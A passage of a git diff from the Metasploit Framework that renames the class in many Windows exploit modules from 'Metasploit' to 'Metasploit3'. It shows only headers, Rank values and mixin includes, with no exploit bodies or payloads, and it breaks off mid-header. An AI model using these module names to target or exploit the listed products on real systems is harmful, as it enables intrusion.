a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 652a47b318..9130d3ad0a 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index 182529c547..c5cc523440 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index a8e30a3347..ba6caf4a42 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index 06d9db5514..f3d90b8117 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index c3fe494a52..9c59408ddc 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 8ff8efb552..084c331db4 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index 05a46b2e0b..f0ccc69f63 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index fe2dd7dda5..d85485c26a 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index 6777ab018a..fca3bb11bf 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 428a212d00..2fa4784861 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index bed56d43b5..3626d62b2c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index d7fb42f35a..7dd833c3c0 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb index f7f8daced8..807267a2c2 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index 252d867067..5c85510fb9 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index be2dd1969d..0286f2ec02 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index 7fda233630..a61d414c6c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb index f11b3c052c..8055b0d947 100644 --- a/modules/exploits/windows/misc/hp_imc_uam.rb +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index cfdeb7b423..fb664c9ae6 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index 13c98bedf1..80b04a5bdc 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index 2fafe34030..b168c6ff5a 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 4d4304f028..404dd0458a 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index 9710c6475f..f8aeca8a72 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index 43ab3023d4..2670342a6c 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 055a6d0818..67a59e7911 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 6ddbbd70e0..d9e85a05f9 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 57235be34e..0612f411ef 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index 9d376177d8..85ad7d3da3 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index e5a42def26..794f12d3c6 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index e41a07a8c8..ce739237e8 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index dc19f9465b..7d538a816f 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index f8ad044e14..b8b84e1f1c 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index 2f6565288e..cf81053e33 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 30c2c2f32d..1457cd8de1 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb index 32688a7397..e101f6beda 100644 --- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb +++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index 15cb335962..fc6e775b23 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index c67b0b4630..9831813bbc 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb +++ b/modules/exploits/windows/misc/lianja_db_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::RopDb diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index 69a50db9ef..1d451f3d3d 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index a31e6fe560..a856002418 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index ea37d663f9..19c613356f 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index d5a014f7bc..c147e4ca8a 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 4431d5cda9..8450f0562a 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index c90fdf1bfb..c61e866b07 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index 9c1051e9a5..a89f98e2de 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index 0ce86b0387..20139031b8 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nvidia_mental_ray.rb b/modules/exploits/windows/misc/nvidia_mental_ray.rb index 14f2f2b985..82a4b8f7a3 100644 --- a/modules/exploits/windows/misc/nvidia_mental_ray.rb +++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb index a6a3c39f3a..ed26b02365 100644 --- a/modules/exploits/windows/misc/poisonivy_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 4d06b27d1a..a5637b1b3e 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index bf9c337fb5..ef53ef6207 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index 6e1aba3dca..9a477457b6 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 2491454f94..54caf13f2d 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index e60a49b385..0b08956557 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index cbf1d759e7..1b536ec7a4 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index a344ac0495..c929b1db48 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index b9ee505e51..988b83a081 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index c1382fc632..1d1237953b 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index a5c9dbf62f..4b867975e7 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index badc118829..cf947bc553 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb index 5d7633d681..a7c7d48bfa 100644 --- a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb +++ b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index 867c0421e8..de6bdafa9a 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 2353005d44..d6acee9bb0 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 89532ded49..34fe258f61 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 9856d47176..18d24e0ecc 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Capture diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index 